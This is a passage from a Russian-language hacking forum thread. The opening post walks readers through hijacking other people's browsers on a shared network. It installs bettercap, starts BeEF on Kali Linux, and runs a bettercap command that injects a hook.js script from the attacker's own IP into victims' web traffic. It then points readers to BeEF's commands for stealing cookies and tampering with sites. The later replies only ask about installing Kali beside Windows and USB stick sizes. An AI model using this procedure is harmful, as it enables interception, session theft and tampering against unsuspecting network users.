На форуме такого нету так что решил замутить тему /Присутпим\ Для начало устанавливаем bettercap командой apt-get install bettercap Запускаем beef в Kali linux он уже установлен Заходим по ссылке которая выделенна на фото (она у вас 100% будет) Авторизуемся введя в логин и пароль слово beef Заходим в терминал и пишем ifconfig wlan0 Копируем IP в 2 строке которая начинается с intet Пишем в терминале команду bettercap --proxy --proxy-module injectjs --js-url "http://айпикоторыйвыскопировали:3000/hook.js" Заходим в beef панель (находится по ссылке где мы авторизировались) Если жертва зайдет на какой то сайт то этот сайт появится в вкладке Online Browser, идем во вкладку этого сайта и идем в Comands Там уже собственно промышляем наши делишки. Начиная от перехвата куки заканчивая измененем всех картинок или закрытием сайта. Ну я думаю что перевести название каждого пункта вам не составит труда как и понять по переводу что можно сделать с помощью этой команды.
Help, чито делать, если не устанавливается линукс? Я крч смог дойти до момента, когда он уже установился, но при запуске какая-то херня вылазиет, черный экран и много букав
флешка 16 гб, я два дня мучался с этим линуксом, даже своей ошибки вроде не нашел в инете у меня ошибок этих было при установке дохера, в итоге последнюю не смог решить
дык я хотел установить рядом с виндой. Там вроде лайв версия не сохраняет данные, да и каждый раз настраивать линукс - впадлу
Допустим на флешку 8 гб я качаю линукс, а флешку 16 гб использую, как диск? и качать "Kali 64 bit Light" или "Kali 64 bit"
Они все образы, есть образ Kali 64 bit весом почти 3 гб, а есть Kali 64 bit Light весом 800 мб Какой качать, если диском будет служить флешка?
создай раздел на флешке да вбей пару команд в терминале, делов на 10 минут, а линукс с виндой встаёт конечно, но с ошибками бывает, и сначала нужно линукс ставить потому что винда затрет линуксовский загрузчик